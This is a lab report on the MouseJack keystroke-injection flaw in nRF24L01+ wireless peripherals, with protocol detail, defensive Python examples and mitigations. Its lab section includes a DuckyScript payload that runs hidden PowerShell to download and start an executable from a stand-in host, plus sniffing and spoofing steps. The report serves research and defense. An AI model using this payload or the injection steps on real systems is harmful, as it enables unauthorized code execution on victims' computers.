
Human-Interface Device (HID) equipment such as wireless keyboards, mice, and presenters often adopts proprietary wireless protocols outside of standard Bluetooth for ease of use and efficiency. The vast majority of these devices’ global market share is built on the nRF24 series (specifically the nRF24L01 and nRF24L01+) radio frequency (RF) transceiver chips manufactured by Nordic Semiconductor, which operate in the 2.4 GHz ISM (Industrial, Scientific, and Medical) band and offer extremely low power consumption.
The vulnerability class known in cybersecurity literature as “MouseJack” (including CVE-2016-10761 for various devices) has transformed encryption deficiencies and hardware validation flaws in wireless units using these proprietary protocols into an effective attack vector. The MouseJack vulnerability allows an attacker to inject unauthorized keystrokes into a target computer from up to 100 meters away, potentially leading to a full system compromise within seconds.
LEGAL WARNING AND DISCLAIMER
This report has been conducted and authored in an isolated laboratory environment strictly for the purposes of education, cybersecurity research, and the development of defensive strategies. The reverse engineering techniques, RF signal manipulations, and exploitation methods described herein are documented with the goal of understanding the anatomy of existing hardware security vulnerabilities and developing enterprise-level countermeasures against them.
Testing or utilizing the techniques, tools, and methods contained in this document on unauthorized systems, hardware, third-party networks, or in public spaces is illegal. The author and associated institutions cannot be held responsible for any direct or indirect legal, commercial, physical, or material damages arising from the malicious or unintentional use of the information in this document. All devices targeted during simulations belong to the laboratory inventory, and no third-party data security has been compromised.
TABLE OF CONTENTS
- General Summary
- Legal Warning and Disclaimer
- Technical Terminology
- 2.4 GHz ISM Band and GFSK Modulation Dynamics
- nRF24L01+ Transceiver Architecture and SPI Register Map
- Enhanced ShockBurst (ESB) Protocol and Packet Structure
- Frequency Hopping Spread Spectrum (FHSS) and Logitech Unifying Protocol
- MouseJack Vulnerability (CVE-2016-10761) and Exploitation Methods
- Implementation and Laboratory Activities
- Evaluation and Solution Recommendations
- References
GLOSSARY OF TECHNICAL TERMINOLOGY AND ABBREVIATIONS
- AES-128 CCM (Advanced Encryption Standard – Counter with CBC-MAC): An advanced hardware cryptography standard that simultaneously provides data encryption and message integrity validation.
- BadUSB / DuckyScript: Attack hardware recognized by operating systems as a legitimate keyboard that types pre-programmed malicious commands (keystroke injection) into the system within seconds, and the scripting language used by such hardware.
- Dongle: A small transceiver hardware unit, typically plugged into a USB port, that enables RF communication between a computer and wireless peripherals (mouse, keyboard, etc.).
- ESB (Enhanced ShockBurst): A proprietary link-layer protocol developed by Nordic Semiconductor that manages hardware-based automatic packet assembly, CRC validation, and acknowledgement (ACK) mechanisms.
- FHSS (Frequency Hopping Spread Spectrum): A technique where an RF signal is transmitted by rapidly switching among many frequency channels at hundreds of hops per second, according to a pre-determined pseudo-random sequence. It complicates interference and eavesdropping.
- GFSK (Gaussian Frequency-Shift Keying): A type of modulation where the carrier frequency is shifted to transmit digital data, smoothed by a Gaussian filter to narrow the signal transition bandwidth.
- ISM Band (Industrial, Scientific, and Medical Band): A worldwide standardized radio communication band that does not require a license, typically operating at the 2.4 GHz frequency.
- MitM (Man-in-the-Middle): A type of attack where the attacker secretly intercepts the communication between two devices to eavesdrop, manipulate data, or inject rogue packets.
- OTP (One-Time Programmable Memory): A cost-effective type of memory that can be written only once during the manufacturing stage and is closed to subsequent firmware updates.
- Pseudo-Promiscuous Mode: A reverse engineering technique where the hardware filtering features (MAC and CRC) of chips like the nRF24L01+ are manipulated to force the sniffing of RF packets belonging to non-targeted devices.
- RCE (Remote Code Execution): A critical security breach that allows an attacker to execute arbitrary commands or malware on a vulnerable target system, either locally or remotely.
- SDR (Software Defined Radio): Radio frequency systems in which components normally implemented in hardware (mixers, filters, amplifiers, demodulators) are controlled and processed in software (e.g., the HackRF One).
- SPI (Serial Peripheral Interface): A synchronous serial communication interface used for short-distance, high-speed communication between microcontrollers and peripheral chips such as the nRF24L01+.
2.4 GHz ISM Band and GFSK Modulation Dynamics
The vast majority of modern wireless keyboards and mice utilize the ISM band, which covers the license-free frequency range from 2.400 GHz to 2.525 GHz. The nRF24L01+ integrated circuits employ the Gaussian Frequency-Shift Keying (GFSK) modulation technique to convert digital data into analog radio waves.
GFSK is based on the fundamental principles of standard FSK (Frequency-Shift Keying) modulation; in this process, digital “1” and “0” data are represented by creating a specific positive or negative deviation in the carrier frequency. However, unlike standard FSK, GFSK passes the data bits through a Gaussian filter before transmitting them to the Voltage-Controlled Oscillator (VCO).
This filtering process smooths the abrupt frequency transitions caused by the data bits, thereby narrowing the signal bandwidth and minimizing spectral leakage into adjacent channels. This efficiency allows for more robust communication in the crowded 2.4 GHz spectrum.

Figure 1: Sample GFSK Modulation Graph
Mathematically, the operational carrier frequency (f_c) for the nRF24L01+ is determined by the following formula:
f_c = 2400 + RF_CH (MHz)
In this equation, RF_CH is a hardware register representing the RF channel index, which takes a value between 0 and 125. The device’s air data rate can be configured in three different modes: 250 kbps, 1 Mbps, or 2 Mbps.
At the 1 Mbps air data rate the channel spacing is 1 MHz. At 2 Mbps, however, the wider signal requires the channel spacing to be increased to 2 MHz to avoid interference between adjacent channels.
The combination of keeping the modulation index low (a frequency deviation of ±160 kHz for 1 Mbps and ±320 kHz for 2 Mbps) and applying Gaussian filtering ensures that nRF24L01+ modules are less affected by environmental noise generated by other complex protocols sharing the same frequency band, such as Wi-Fi (802.11) and Bluetooth (802.15.1).
However, this relatively simple modulation technique makes it quite easy for the signal to be captured mid-air and demodulated using SDR (Software Defined Radio) devices.
nRF24L01+ Transceiver Architecture and SPI Register Map
Designed by Nordic Semiconductor, the nRF24L01+ is a radio unit featuring a System-on-Chip (SoC)-like architecture. It consists of a fully integrated frequency synthesizer, power amplifier (PA), low-noise amplifier (LNA), crystal oscillator, demodulator, modulator, and a Baseband Protocol Engine (Enhanced ShockBurst™). The chip utilizes a 4-pin hardware SPI (Serial Peripheral Interface) bus with a maximum speed of 10 Mbps to communicate with microcontrollers (MCUs). Its power consumption profile is highly optimized, allowing devices to operate for months on a single battery; it draws 11.3 mA during transmission (TX) at 0 dBm output power and 13.5 mA during 2 Mbps data reception (RX). These values drop significantly to 26 µA in Standby-I mode and a mere 900 nA in Power Down mode.
At the architectural level, the module’s operating modes, status checks, and RF parameters are configured by manipulating specific hardware registers via commands sent over SPI. The table below summarizes the SPI registers and their functions, which are of critical importance for signal analysis and laboratory manipulations:
| Register | Address (Hex) | Functional Description and Laboratory Context |
|---|---|---|
| CONFIG | 0x00 | Controls main configurations such as power status (PWR_UP), RX/TX role (PRIM_RX), and the length of the hardware CRC mechanism (EN_CRC, CRCO). For pseudo-promiscuous mode, the CRC is disabled here. |
| EN_AA | 0x01 | Enables or disables the Auto-Acknowledgment feature for data pipes. This register is manipulated to force a response from a target device during spoofing or to perform passive sniffing. |
| SETUP_AW | 0x03 | Sets the Address Width. Under normal conditions, it can be set to 3, 4, or 5 bytes. Shortening the address field is a critical reverse engineering step for sniffing operations. |
| RF_CH | 0x05 | Determines the radio frequency channel (0-125) where the signal will be broadcast or monitored. Frequency hopping algorithms constantly write new values to this register. |
| RF_SETUP | 0x06 | Configures the RF air data rate (250kbps, 1Mbps, 2Mbps via RF_DR_LOW/HIGH flags) and RF output power (0, -6, -12, -18 dBm via RF_PWR). |
| STATUS | 0x07 | Contains interrupt flags indicating data received (RX_DR), data transmitted successfully (TX_DS), or reaching the maximum retransmission limit (MAX_RT). |
| RX_ADDR_P0 | 0x0A | Holds the receiving address for Data Pipe 0. Once an attacker identifies the target device’s MAC address, they impersonate the device by writing that address into this register. |
The device also features a MultiCeiver (Multiple Transmitter Single Receiver) architecture, which allows it to listen to six different data pipes simultaneously in a 1:6 star network topology. This specific feature enables a single USB receiver (dongle) to pair with multiple mice or keyboards at once.
While each data pipe has its own unique configuration address, the hardware architecture dictates that the demodulator can only process and move one packet into the FIFO (First-In-First-Out) buffer at any given time.

Figure 2: An Example of Star Network Topology
Enhanced ShockBurst (ESB) Protocol and Packet Structure
The most significant innovation that distinguishes the nRF24L01+ series from previous generations is the Enhanced ShockBurst (ESB) hardware link layer engine. ESB automates packet assembly, validation, automatic acknowledgment (ACK), and automatic retransmission processes at the hardware level, almost entirely eliminating the processing load on the microcontroller (MCU) and reducing bus traffic.
To understand the MouseJack attack at the hardware level, it is essential to examine the strict bit-level sequence of the ESB packet structure. Deciphering raw data sniffed over-the-air relies on the reverse engineering of this structure. A standard ESB packet consists of the following components:
| Field | Size | Description |
|---|---|---|
| Preamble | 1 byte | Synchronizes the receiver’s demodulator. It is 10101010 or 01010101 depending on the first bit of the address. This sequence is mimicked in pseudo-promiscuous mode attacks to bypass the hardware filtering shield. |
| Address | 3-5 bytes | The hardware MAC address that routes the packet to the correct receiver. Packets that do not match the target address are silently dropped by the ESB engine. The first stage of a MouseJack attack is the identification of this address. |
| Packet Control Field (PCF) | 9 bits | 6 bits of Payload Length (the data length in Dynamic Payload mode), 2 bits of PID (Packet Identity, used to detect retransmissions), and 1 NO_ACK bit (the no-acknowledgment flag). |
| Payload | 0-32 bytes | Carries the actual user/application data (mouse coordinates, click information, or keystrokes). It can be configured as either Dynamic (DPL) or static length. |
| CRC | 1-2 bytes | Cyclic Redundancy Check: a hardware integrity check over the Address, PCF, and Payload fields. It does not provide encryption; it only detects transmission errors. |
In the context of the MouseJack vulnerability, the hardware receiving an ESB packet and validating the CRC and Address match was sufficient for the firmware inside the USB dongle to accept the packet as a legitimate HID (Human Interface Device) command. Since the encryption layer is handled not within the nRF chip’s hardware but in the firmware layer written by the device manufacturer, the dongle simply assumed it had received a “valid RF packet” and forwarded the data directly to the operating system.
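The frame layout in the table above, and the point that the CRC is only an error check, as an added example written for this report (not Nordic's or the report's own code): it builds an ESB frame bit by bit, parses it back the way a receiver would, and shows that one flipped payload bit fails the CRC. It assumes the datasheet's 2-byte CRC (polynomial 0x1021, initial value 0xFFFF) computed over Address, PCF and Payload, with the preamble excluded.

```python
# Added example (not Nordic's or the report's code): build/parse an ESB frame bit by bit.
# Assumes the datasheet's 2-byte CRC (poly 0x1021, init 0xFFFF) over Address+PCF+Payload.

def bytes_to_bits(data):
    """MSB-first bit list for a byte sequence (the order ESB shifts bits out)."""
    return [(b >> (7 - i)) & 1 for b in data for i in range(8)]

def int_to_bits(value, width):
    return [(value >> (width - 1 - i)) & 1 for i in range(width)]

def bits_to_int(bits):
    out = 0
    for b in bits:
        out = (out << 1) | b
    return out

def bits_to_bytes(bits):
    return bytes(bits_to_int(bits[i:i + 8]) for i in range(0, len(bits), 8))

def crc16_esb(bits):
    """CRC-16 CCITT computed bit-serially, so the 9-bit PCF needs no byte alignment."""
    crc = 0xFFFF
    for bit in bits:
        crc ^= bit << 15
        crc = ((crc << 1) ^ 0x1021) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc

def build_frame(address, payload, pid=0, no_ack=0):
    """Preamble | Address | PCF (6-bit length, 2-bit PID, NO_ACK) | Payload | CRC-16."""
    if not 3 <= len(address) <= 5 or len(payload) > 32:
        raise ValueError("address must be 3-5 bytes, payload 0-32 bytes")
    preamble = 0xAA if address[0] & 0x80 else 0x55      # 10101010 or 01010101
    body = (bytes_to_bits(address) + int_to_bits(len(payload), 6)
            + int_to_bits(pid & 3, 2) + [no_ack & 1] + bytes_to_bits(payload))
    return bytes_to_bits([preamble]) + body + int_to_bits(crc16_esb(body), 16)

def parse_frame(bits, addr_len=5):
    """Decode a frame the way a receiver does; raise ValueError on CRC mismatch."""
    pos = 8                                               # skip the preamble byte
    address = bits_to_bytes(bits[pos:pos + addr_len * 8]); pos += addr_len * 8
    length = bits_to_int(bits[pos:pos + 6]); pos += 6
    pid = bits_to_int(bits[pos:pos + 2]); pos += 2
    no_ack = bits[pos]; pos += 1
    payload = bits_to_bytes(bits[pos:pos + length * 8]); pos += length * 8
    crc_rx, crc_calc = bits_to_int(bits[pos:pos + 16]), crc16_esb(bits[8:pos])
    if crc_rx != crc_calc:
        raise ValueError(f"CRC mismatch: got {crc_rx:#06x}, expected {crc_calc:#06x}")
    return {"address": address, "length": length, "pid": pid,
            "no_ack": no_ack, "payload": payload}

def crc_passes(bits, addr_len=5):
    """True if the CRC checks out: a transmission-error check, not authentication."""
    try:
        parse_frame(bits, addr_len)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    # Constructed sample: 5-byte address, 4-byte mouse-style payload, then one payload bit flipped.
    frame = build_frame(bytes.fromhex("E7E7E7E7E7"), bytes([0x00, 0x05, 0x00, 0xFB]), pid=2)
    damaged = frame[:]; damaged[60] ^= 1
    print(parse_frame(frame), "damaged frame passes CRC:", crc_passes(damaged))
```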
Frequency Hopping Spread Spectrum (FHSS) and Logitech Unifying Protocol
The heavy use of the 2.4 GHz band by Wi-Fi, Bluetooth, microwave ovens, and other IoT devices creates a significant environment of RF interference and noise. To prevent data loss and latency, proprietary protocols like Logitech Unifying utilize Frequency Hopping Spread Spectrum (FHSS) algorithms inspired by military communication standards.
Although the Logitech Unifying protocol is built upon the nRF-based ESB packet structure, it prevents devices from remaining on a static channel for long periods. The algorithm continuously changes the carrier frequency (hop rate) across a pre-determined pseudo-random frequency table at specific time intervals. These transitions, synchronized with microsecond precision between the transmitter and receiver, occur during a specific “Dwell Time” (the duration spent on a single frequency) and allow for the bypassing of noisy channels.
This mechanism is the primary defense that makes it difficult to monitor the link with SDR (Software Defined Radio) devices or with sniffing nRF modules. The time window in which the receiver (USB dongle) must return an acknowledgment (ACK) for a packet from a mouse or keyboard—and in which the transmitter detects packet loss—is limited by hardware to an extremely narrow interval, such as 250 microseconds.
Traditional SDR-based decoders (e.g., USRP or HackRF) cannot retune to the channel and generate a rogue ACK packet within this 250-microsecond window because of the latency added by computer-based GNU Radio processing over USB and by operating-system overhead. Consequently, practical and reliable MouseJack exploitation relies on hardware that is itself nRF24L-family based (the nRF24L01+ or nRF24LU1+, as in the Crazyradio PA or Flipper Zero GPIO modules) rather than on computer-based SDRs to manipulate signals in real time.
MouseJack Vulnerability (CVE-2016-10761) and Exploitation Methods
The root cause of the MouseJack vulnerability class lies in a fundamental asymmetry in wireless security: while data transmitted by wireless keyboards is typically encrypted using AES (or similar proprietary algorithms), movement (X-Y coordinate shifts) and click data from wireless mice are often transmitted over-the-air as entirely unencrypted plaintext. When the USB dongle receives an incoming packet via the nRF24L01+ integrated circuit, the hardware cannot tell whether that packet should have been encrypted. Instead, the dongle’s firmware, which receives the packet over SPI, is responsible for distinguishing unencrypted “mouse” packets from encrypted “keyboard” packets.
The critical failure point occurs during this validation stage: many manufacturers’ USB dongles do not verify whether the HID commands contained within a packet match the device type that sent it. Under normal conditions, a paired mouse should only transmit “movement” or “click” payloads. However, if an attacker learns the target mouse’s MAC address (via sniffing) and spoofs it, they can craft a packet formatted as an “unencrypted mouse packet” but embed keyboard keystroke data instead of movement data. Because the packet is unencrypted (matching the expected format for a mouse), the dongle firmware fails to detect the anomaly, decrypts nothing, and forwards the data directly to the computer’s USB port. The operating system then accepts this data through the USB HID (Human Interface Device) class drivers as legitimate keyboard input, executing the keystrokes on the victim’s screen.
In laboratory tests and technical bulletins published by Bastille researchers, it has been recorded that an attacker’s keystroke injection speed can reach hundreds of strokes per second (approximately one character every 8 ms, or 7,500 keystrokes per minute). In literature, the MouseJack vulnerability is classified under three main exploitation types:
- Keystroke Injection via Mouse Spoofing: As explained above, this involves the lack of device-type validation and the embedding of keyboard commands within unencrypted mouse packets.
- Keystroke Injection via Keyboard Spoofing: A situation where some dongles—despite the keyboard’s capability to encrypt—continue to accept unencrypted packets from keyboards, effectively allowing a “downgrade attack.” In this scenario, the attacker acts as a fake keyboard and sends unencrypted text directly.
- Forced Pairing: Devices normally recognize each other at the factory or during pairing modes that remain active for a limited time (30–60 seconds). Some dongles possess vulnerabilities in these timeouts or physical button requirements. An attacker can remotely bypass the pairing mode and register a malicious, unencrypted keyboard to the dongle without the user’s consent.
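The validation failure described above, modelled as an added example written for this report (not any vendor's firmware): a vulnerable dispatcher that forwards any HID report from a known address sits beside a hardened one that ties the report kind to the paired device type and refuses plaintext from devices that must encrypt, covering the first two exploitation types; forced pairing is outside this model. Device types, addresses and packet fields are constructed.

```python
# Added example (a model written for this report, not any vendor's firmware): the
# dongle-side validation step that runs after the nRF24L01+ has already accepted a
# frame whose address and CRC matched. Device types, addresses and packet fields
# are constructed for illustration.

from dataclasses import dataclass

MOUSE, KEYBOARD = "mouse", "keyboard"
# HID report kinds each paired device type is entitled to send to the host.
ALLOWED_REPORTS = {MOUSE: {"move", "click"}, KEYBOARD: {"key"}}
# Device types whose payloads must arrive encrypted (keyboards carry text).
ENCRYPTION_REQUIRED = {KEYBOARD}

@dataclass
class RfPacket:
    address: bytes        # ESB address that passed the hardware filter
    encrypted: bool       # whether the firmware-layer cipher was applied
    report: str           # HID report kind carried in the payload
    payload: bytes

def vulnerable_dispatch(paired, pkt):
    """Behaviour the report describes: address known => forward to USB HID as-is."""
    if pkt.address not in paired:
        return "drop: unknown address"
    return "forward:" + pkt.report

def hardened_dispatch(paired, pkt):
    """Tie the report kind to the paired device type and refuse encryption downgrades."""
    dev_type = paired.get(pkt.address)
    if dev_type is None:
        return "drop: unknown address"
    if pkt.report not in ALLOWED_REPORTS[dev_type]:
        return f"drop: {dev_type} may not send {pkt.report} reports"
    if dev_type in ENCRYPTION_REQUIRED and not pkt.encrypted:
        return "drop: plaintext from a device that must encrypt"
    return "forward:" + pkt.report

def compare(paired, pkt):
    """Return (vulnerable_result, hardened_result) for one received packet."""
    return vulnerable_dispatch(paired, pkt), hardened_dispatch(paired, pkt)

# Constructed pairing table: one mouse and one keyboard enrolled with the dongle.
MOUSE_ADDR, KB_ADDR = bytes.fromhex("A1B2C3D4E5"), bytes.fromhex("A1B2C3D4E6")
PAIRED = {MOUSE_ADDR: MOUSE, KB_ADDR: KEYBOARD}

if __name__ == "__main__":
    cases = {
        "genuine mouse move":        RfPacket(MOUSE_ADDR, False, "move", b"\x05\x00"),
        "keystrokes in mouse frame": RfPacket(MOUSE_ADDR, False, "key", b"\x04"),
        "plaintext keyboard frame":  RfPacket(KB_ADDR, False, "key", b"\x04"),
        "encrypted keyboard frame":  RfPacket(KB_ADDR, True, "key", b"\x9f"),
    }
    for name, pkt in cases.items():
        vulnerable, hardened = compare(PAIRED, pkt)
        print(f"{name:28} vulnerable: {vulnerable:14} hardened: {hardened}")
```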
Implementation and Laboratory Activities
The first step in monitoring nRF24L01+-based wireless communication is to make the invisible target frequency spectrum visible and analyzable. For this purpose, the HackRF One, an advanced half-duplex SDR platform operating between 1 MHz and 6 GHz, was utilized. The HackRF One is capable of transferring a maximum instantaneous bandwidth of 20 MHz to a computer at a sampling rate of 20 million samples per second (20 MSPS). However, considering the 125 MHz total width of the 2.4 GHz band, standard 20 MHz static windows are insufficient for capturing the hopping sequences of signals that change channels (FHSS) hundreds of times per second.
To cover the whole band despite this limitation, the hackrf_sweep tool, which steps the HackRF One across the 2.4 GHz band, was employed to monitor nRF24L01+-based wireless communication.
Note: The codes used in this report were written for Linux-based terminals. If you are using Windows or macOS, please be aware that these codes may not function as intended.
hackrf_sweep -f 2400:2525 -w 1000000 -a 1 -l 24 -g 24
- -f 2400:2525: Limits the scan to the relevant ISM band.
- -w 1000000: Sets a 1 MHz bin width to match the 1 MHz channel spacing of the nRF24L01+ at 1 Mbps.
- -a 1, -l 24, -g 24: Enables the RX amplifier and sets the LNA (IF) gain and the VGA (baseband) gain to 24 dB each.

Figure 3: Frequency hops demonstrating the target device’s FHSS behavior in the 2.4 GHz spectrum.
To overcome the processing latencies inherent in GNU Radio, microcontroller-based nRF modules were configured in “Pseudo-Promiscuous Mode.” In this mode, ESB features are disabled, the address matching length is reduced, and hardware CRC is deactivated, allowing the target’s unencrypted MAC address to be identified within seconds.
Terminal Command:
sudo ./tools/nrf24-scanner.py -c {2..74..3} -l
The identified MAC address was then assigned to a Flipper Zero device connected to an nRF24L01+ module via GPIO pins.
The sample DuckyScript (BadUSB) payload prepared for the simulation:
DELAY 1000
GUI r
DELAY 500
STRING cmd.exe
ENTER
DELAY 500
STRING powershell.exe -w hidden -c “Invoke-WebRequest -Uri ‘http://malicious.local/payload.exe’ -OutFile ‘C:\Windows\Temp\p.exe’; Start-Process ‘C:\Windows\Temp\p.exe'”
ENTER
This payload was transmitted over RF to the victim’s dongle, successfully simulating RCE (Remote Code Execution) on the system.
Evaluation and Solution Recommendations
In conclusion, MouseJack attacks are significant threats that can lead to severe consequences and should not be underestimated. Defensive measures can be examined under the following three categories:
1. Hardware and Firmware Updates
Devices must be updated to patched versions using DFU (Device Firmware Update) images via Logi Options+ (Windows) or fwupdmgr (Linux). However, for low-cost hardware equipped with OTP (One-Time Programmable) memory, physical destruction and replacement of the unit is the only viable solution.
2. Cryptographic Countermeasures
Hardware encryption using the AES-128 CCM (Counter with CBC-MAC) standard should be mandated not only for keyboards but for mice as well. When procuring new generation devices, “AES-128 encryption support” and “Updatable Firmware” should be added to the technical specifications.
3. SOC and Threat Detection
SDR hardware should be integrated into WIDS/WIPS (Wireless Intrusion Detection/Prevention Systems) infrastructures to monitor FHSS anomalies in the 2.4 GHz band. Additionally, rules should be added to EDR (Endpoint Detection and Response) agents to block unusual HID behaviors, such as thousands of keystrokes per second.
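The hackrf_sweep scan from the laboratory section and the WIDS recommendation above share one added example, written for this report and not part of hackrf_sweep or any WIDS product: it parses hackrf_sweep CSV lines, maps each bin to an RF_CH index through f_c = 2400 + RF_CH (MHz), and counts how often the strongest emitter changes channel between sweeps. It assumes the CSV layout "date, time, hz_low, hz_high, hz_bin_width, num_samples, dB, ..." with 1 MHz bins (-w 1000000); the sample lines are constructed, and since sweeps are far slower than the true hop rate it observes channel changes at sweep cadence only.

```python
# Added example (not part of the report's toolchain or of hackrf_sweep): turn
# hackrf_sweep CSV lines into nRF24 channel indices via f_c = 2400 + RF_CH (MHz)
# and count how often the strongest 2.4 GHz emitter changes channel between sweeps.
# Assumes the CSV layout "date, time, hz_low, hz_high, hz_bin_width, num_samples,
# dB, dB, ..." and 1 MHz bins (-w 1000000). Sample lines are constructed.

from collections import OrderedDict

BASE_MHZ = 2400          # f_c = 2400 + RF_CH, so RF_CH = f_c(MHz) - 2400
MAX_RF_CH = 125

def parse_sweep_line(line):
    """Return (timestamp, [(rf_ch, dB), ...]) for one hackrf_sweep CSV line."""
    fields = [f.strip() for f in line.split(",")]
    timestamp = f"{fields[0]} {fields[1]}"
    hz_low, bin_width = int(fields[2]), float(fields[4])
    bins = []
    for i, db in enumerate(fields[6:]):
        # Map each bin's lower edge to a channel index (coarse: 1 MHz bins).
        rf_ch = int((hz_low + i * bin_width) / 1e6) - BASE_MHZ
        bins.append((rf_ch, float(db)))
    return timestamp, bins

def strongest_channel_per_sweep(lines, threshold_db):
    """Map timestamp -> (rf_ch, dB) of the strongest bin above threshold, or None."""
    per_sweep = OrderedDict()
    for line in lines:
        if not line.strip():
            continue
        ts, bins = parse_sweep_line(line)
        best = per_sweep.get(ts)          # several CSV lines share one sweep timestamp
        for ch, db in bins:
            if 0 <= ch <= MAX_RF_CH and db >= threshold_db and (best is None or db > best[1]):
                best = (ch, db)
        per_sweep[ts] = best
    return per_sweep

def hop_stats(lines, threshold_db=-50.0, min_distinct=3):
    """Summarise channel changes across sweeps and flag FHSS-like behaviour."""
    seq = [b[0] for b in strongest_channel_per_sweep(lines, threshold_db).values() if b]
    transitions = sum(1 for a, b in zip(seq, seq[1:]) if a != b)
    return {"sequence": seq, "distinct": len(set(seq)), "transitions": transitions,
            "fhss_suspect": len(set(seq)) >= min_distinct}

# Constructed sample: three sweeps, two 5 MHz segments each, one strong bin per sweep.
SAMPLE_SWEEP = """\
2024-05-01, 10:00:00.000000, 2400000000, 2405000000, 1000000.00, 20, -71.2, -70.8, -38.5, -70.1, -70.9
2024-05-01, 10:00:00.000000, 2470000000, 2475000000, 1000000.00, 20, -70.4, -71.0, -70.6, -69.9, -70.3
2024-05-01, 10:00:00.250000, 2400000000, 2405000000, 1000000.00, 20, -70.9, -71.1, -70.2, -70.7, -71.3
2024-05-01, 10:00:00.250000, 2470000000, 2475000000, 1000000.00, 20, -70.5, -70.0, -70.8, -39.7, -71.2
2024-05-01, 10:00:00.500000, 2400000000, 2405000000, 1000000.00, 20, -70.3, -41.0, -70.6, -70.2, -71.0
2024-05-01, 10:00:00.500000, 2470000000, 2475000000, 1000000.00, 20, -71.1, -70.7, -70.9, -70.4, -70.6
"""

if __name__ == "__main__":
    print(hop_stats(SAMPLE_SWEEP.splitlines()))
```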
Eyüp Efe Aslan
REFERENCES
- About — MouseJack, mousejack.com
- MouseJack: Remote exploitation via radio frequencies – Help Net Security, helpnetsecurity.com
- UPDATE: Wireless mice and keyboards vulnerable to MouseJack takeover – SC Media, scworld.com
- MouseJack, sra.io
- nRF24L01/nRF24L01+ module principle introduction – NiceRF, nicerf.com
- NRF24L01.pdf – elechouse, elechouse.com
- crowe.com/insights/crowe-cyber-watch/wireless-peripheral-hijacking-mousejack-attacks-explained-dgs
